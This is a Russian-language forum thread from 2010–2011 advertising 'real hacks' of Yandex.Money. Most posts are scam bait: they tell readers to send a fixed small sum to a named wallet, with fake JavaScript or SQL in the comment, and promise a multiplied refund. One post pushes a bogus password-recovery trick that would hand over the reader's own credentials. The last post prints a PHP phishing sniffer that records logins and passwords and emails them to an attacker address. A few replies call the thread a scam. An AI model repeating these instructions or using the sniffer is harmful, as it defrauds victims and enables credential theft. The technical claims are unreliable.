 |
| Реальный взлом Яндекс Деньги! |
| cormanik | Дата: Вторник, 31.08.2010, 17:08 | Сообщение # 1 |
|
Сообщений: 1
| Доброго времени суток! Меня зовут Олег. Я программист (PHP, Delphi),В прошлом известен в Интернете ещё как один из разработчик программы SpyAgent (клавиатурный шпион). Сейчас эту программу не развиваю .На данный момент я планирую и разрабатываю новые проекты, связанные с пассивными источниками дохода. Работаю также в сфере SEO, немножко интересуюсь МЛН-бизнесом (не "пирамидами", а только с участием реальной полезной продукции).
Как то раз пришла мне в голову мысль взломать яндекс систему потому что это первая система на которой мало всякой защиты в первую очередь я нугуглил в поисковике много информации у видел масса разных разводов, в том числе и про волшебные кошельки запомните что нету волшебных кошельков и программ для взлома. Программы для взлома это вирус который считывает ваш пароль и отправляет своему хозяину по эл.почте ваш платежные данные. Как то я писал на этом форуме про взлом как взломать яндекс деньги для этого написал специальный скрип для одного кошелька чтоб он давал сбой и присылал на ваш счет 300 рублей. Но какой то один не умный человек взял и выложил видео в поисковую систему яндекс и этот форум сразу же закрыли. Мне пришлось переделывать скрипт по новой искать дыры в системе яндекс.И вот через месяц я переделал скрипт полностью и как раз форум этот опять открылся кстати спасибо Админу что он открыл этот форум теперь я могу поделиться информ. как взломать яндекс кошелек.
И так начнем для начала нужно завести кошелек в системе яндекс и положить рублей 60 через терминал оплаты сот. связи ну или каким то другим способом.Потом нужно перевести ровно 50 рублей не больше не меньше на этот номер счета 41001680084044 В комментарии нужно скопировать этот скрипт: <script language="JavaScript" type="text/javascript">// the number of ringsvar ringnumber=50function showrings() {ifdocument.all) { fr (i=0;i<=ringnumber;i++) { if (i_fontsize[i]>=maxfontsize) {i+".style") thisring.visibility="hidden"i_fontsize[i]=startfontsizestep[i]=ringnumber*i*300startfontsize=Math.floor((maxfontsize/ringnumber))*(i+1)<body><a href="http://scriptic.yandexmoney/seOver="showrings()" onMouseOut="hiderings()">Scriptic.rod.ru> И перевести где то в течении 4 минут обнавляете страницу и вам на счет должны прийти 300 рублей.Могу выложить старое видео этого парня из за которого мне пришлось попатеть над взломам.
Это хороший способ нажиться на этом!Этим можно пользоваться только один раз в день чтобы страждущие админы яндекса не про палили этот способ.
Уверяю вас этот способ работает!!! Проверено многими пользователями. Просмотреть видео, как это делать http://www.youtube.com/watch?v=Nos7uOajIiQ
Сообщение отредактировал cormanik - Вторник, 31.08.2010, 17:09 |
| |
|
| |
| sergey1 | Дата: Пятница, 03.09.2010, 12:07 | Сообщение # 2 |
|
Сообщений: 11
| Это всё развод!
|
| |
|
| |
| Anak | Дата: Понедельник, 24.01.2011, 15:22 | Сообщение # 3 |
|
Сообщений: 1
| Взлом Yandex ! Тут все просто. Меня поражают все эти юзера, которые хотят защитить свой почтовый ящик и придумывают себе пароли такие, что сразу же их забывают. Надо брать пароли легко запаминающиеся, например, имя вашей собаки, у меня ее зовут Fr$#73*$_&^jd. Но вот для таких вот опрометчивых пользователей и были придуманы системы аля-забыл пароль. Помните, что при регистрации вас просили ввести секретный вопрос для восстановления паролей?
Так вот какую уязвимость я обнаружил. По адресу GeneralQBot@yandex.ru сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом (тема письма). Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для первого! Так шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем . Образец: (к примеру) Итак, мы хотим обломать negodaii@yandex.ru
Наш ящик arsenii_shelchin@yandex.ru, пароль 1paspas2, платежный пароль pass1
Пишем письмо роботу на GeneralQBot@yandex.ru
Subject(тема письма): login=negodaii& pass=& answer=; login=arsenii_shelchin(логин)& pass=1paspas2(указываем пароль)& answer=platpass(платежный пароль)=pass1=& Т.е. первый раз вставляем в тему письма запрос о ящике-жертве - negodaii@yandex.ru :
login=negodaii&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные!
login=arsenii_shelchin&pass=1paspas2& answer= platpass=pass1=&
Итого : тема сообщения выглядит вот так :
login=negodaii& pass=&answer=; login=arsenii_shelchin& pass=1paspas2&answer=platpass=pass1= Все, ждите пасс на ваше мыло!!! (Answer = ответ на секретный вопрос, но прокатывает и без него, запросы разделяются точкой с запятой.) Пароли приходят где-то в течении 2 суток, но чаще в течении пары часов!
123
|
| |
|
| |
| BlackManMS | Дата: Среда, 26.01.2011, 10:39 | Сообщение # 4 |
|
Сообщений: 3
| А этой очевидно спам!
Не ведитесь, если тут есть админы, то закройте тему!
|
| |
|
| |
| andersmon | Дата: Понедельник, 21.02.2011, 13:37 | Сообщение # 5 |
|
Сообщений: 3
| Привет всем я вчера 20.02.2011 нашел в интернете один новый и рабочий яндекс кошелек на который ложеш 40 рублей и тебе приходит с этого же кашелька 100 рублей я истественно не поверил думал развод но прочитал все комментарии и все пишут что это реально ну я попробовал рескнуть и не поверите мне реально пришло 100 рублей просто нет слов как я был рад.
Короче просто отсылаеш 40 рублей (это почти не деньги а копейки) на этот яндекс кошелек 41001615520656 и тебе приходит 100 рублей я не знаю как это но это реально работает. Только мне пришли 100 рублей через 2 часа. В день получилось 300 рублей. В день можно только 3 раза отсылать тогда сотня приходит если отсылаеш четвертый не приходит мне не пришла а на сегодня я еще раз попробовал все приходит ТОЛЬКО ЗАПОМНИТЕ НАДО ОТСЫЛАТЬ НЕ БОЛЬШЕ ТРЕХ РАЗ В ДЕНЬ…
|
| |
|
| |
| devoxa111 | Дата: Вторник, 22.02.2011, 15:27 | Сообщение # 6 |
|
Сообщений: 2
| Всем привет я на днях 18.02.2011 нашла в интернете какой то яндекс кошелек на который скидываеш 40 рублей со своего яндекс кошелька и тебе приходит 140 рублей на 100 рублей больше. Я конечно не поверила во все это думала очередной лохотрон и развод ну в сеже не удержалась и скинула деньги. И ВЫ НЕ ПОВЕРИТЕ МНЕ РЕАЛЬНО ПОВТОРЯЮ РЕАЛЬНО ПРИШЛИ 140 РУБЛЕЙ ВЫ НЕ ПРЕДСТАВЛЯЕТЕ КАК Я БЫЛА РАДА!!!!!! Теперь каждый день скидываю 40 рублей на этот кошелек и мне приходят деньги. Хотите верти хотите нет. Короче вот этот яндекс кошелек 41001615520656 скидываеш на него со своего яндекс кошелька ровно 40 рублей (не больше и не меньше это же почти копейки) и тебе придет 140 рублей мне всегда приходит НО ЗАПОМНИТЕ В ДЕНЬ ЭТО РАБОТАЕТ ТОЛЬКО 3 РАЗА ЕСЛИ ОТОШЛЕШ ЧЕТВЕРТЫЙ РАЗ ТЕБЕ НЕ ЧЕГО НЕ ПРИЙТЕТ (сама пробовала) А 3 РАЗА ВСЕГДА ПРИХОДИТ 280 РУБЛЕЙ ЗА Я ОЧЕНЬ РАДА…………..
|
| |
|
| |
| NeZq[d] | Дата: Вторник, 12.04.2011, 15:20 | Сообщение # 7 |
|
Сообщений: 2
| Здравствуйте, я один из лучших хакеров рунета(F0rEsT), Я нашёл новейший взлом который работает на 100%, и хочу поделится им с вами! Вот и сам взлом Яндекс Денег: Создаём кошелёк если уже есть то не надо (Создавать здесь: money.yandex.ru)
Ложим на свой счёт 50-100 рублей.
Нажимаем на ссылку(кнопку) перевести.
При переводе прописываем:
Перевод на счёт, Номер получателя: 41001541404943.
Сумма к получению 50-100 руб! Если скинете больше, деньги не придут, и не меньше.
Сообщение к получателю: Code JavaScript(4453535:fffffff.fg.cc_money.dd.as.lff10565010014056-03560=0); Там где «0» менять 0 на ваше номер кошелька!
Предупреждение: Не чего в тексте не меняйте а то деньги не придут!
Название платежа: aa.bdidt.ss
Предупреждение: Если не ввести сообщение получателя и название платежа деньги не прийдут!
Нажимаем перевести и через 2-5 мин вам приходят:
Если вы кинули 50 рублей будет 500,а если 100 будет 1000, тоесть сумма увеличивается в 10 раз! Взлом работает на 100%! Взламывайте на здоровье :) Предупреждение: Чтобы ваш кошелёк не забанили, взломаете 5 раз минимум в день!
|
| |
|
| |
| Desperados | Дата: Среда, 13.04.2011, 14:33 | Сообщение # 8 |
|
Сообщений: 1
| NeZq[d], Слушай а это у тя не лохотрон???? А??? А то я уже стока бабла потерял пока искал кой нить способ!!!! Добавлено (13.04.2011, 14:33)
---------------------------------------------
Урааа. Нашел!!! Новый взлом снова работает! ВЗЛОМ: Заводим свой собственный кошелёк(Это здесь: money.yandex.ru)
Ложим на счёт 50-100 руб!
И нажимаем перевести!
При переводе:
Перевод на счёт!Номер получателя: 41001839930669
Сумма к получению 50-100 руб!Но не больше и не меньше!А то деньги не прийдут!
Сообщение к получателю
<singer_id "Ваш номер кошелька"=singer "cc.cash.id" "money"=1000=50;JavaScript;100=50}robox.txt?money.yandex.ru{cheange}>
ВНИМАНИЕ НЕ ЧЕГО В СООБЩЕНИИ ПОЛУЧАТЕЛЯ НЕ ПЕРЕДЕЛЫВАТЬ!!!А ТО ДЕНЬГИ НЕ ПРИЙДУТ!!!
Название платежа: cc.cash.id
Если не ввести сообщение получателя и название платежа деньги не прийдут!
Нажимаем перевести и через 5-10 мин вам приходят:
Если вы кинули 50 рублей будет 500,а если 100 будет 1000!!!
Не теряйте надежду в взломе! НО ПРЕДУПРЕЖДАЮ ДЕЛАЙТЕ ЕТО МАКСИМУМ 3 РАЗА НА ДНЮ А ТО ВАС РОБОТ ЯНДЕКС ДЕНЕГ СПАЛИТ!!!
ВЗЛОМ 100% РАБОЧИЙ ПРОВЕРЕН На многих компах!
|
| |
|
| |
| FreDRik | Дата: Суббота, 23.04.2011, 18:25 | Сообщение # 9 |
|
Сообщений: 3
| ахахаа. Не тема, а страшный ужас. Админы, или верней модераторы форума куда вы смотрите. Ведь наивные пользователи могут клюнуть на подобные темы и воспользоваться указаниями, потеряв не мало денег и нервов в итоге. Закрывайте тему, немедленно!!!
Дайте человеку все что он хочет, и в тоже самое время он поймет, что все это не все
|
| |
|
| |
| asdfghytrewq | Дата: Понедельник, 16.05.2011, 17:13 | Сообщение # 10 |
|
Сообщений: 1
| «Как Все начиналось»
Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = "mymail@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька 41001596194506
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.
"Как выполнить взлом яндекс денег на своем компе" 1. Для начала проходим сюда yandex.ru
2. Заводим почтовый ящик
3. Заводим яндекс счет
4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей
5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей
6 Переводим на этот счет 41001596194506 где мы сделали баг
7. Где сообщение получателю пишем вот это:
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''
Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001493134589»
8. В название платежа пишем это:
cc.content_id
9. И потом жмем перевести
10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Проверена это уже на многих компах так что дерзайте. А все что написано выше этого сообщения ЛОХОТРОН. сам купился если чесно. халявы больше нигде нет. это один из 4 способов. чтобы найти инфу потратил 2 года(( но результат того стоит. попробуйте..сам в шоке был когда сработало.
|
| |
|
|
|
|
|
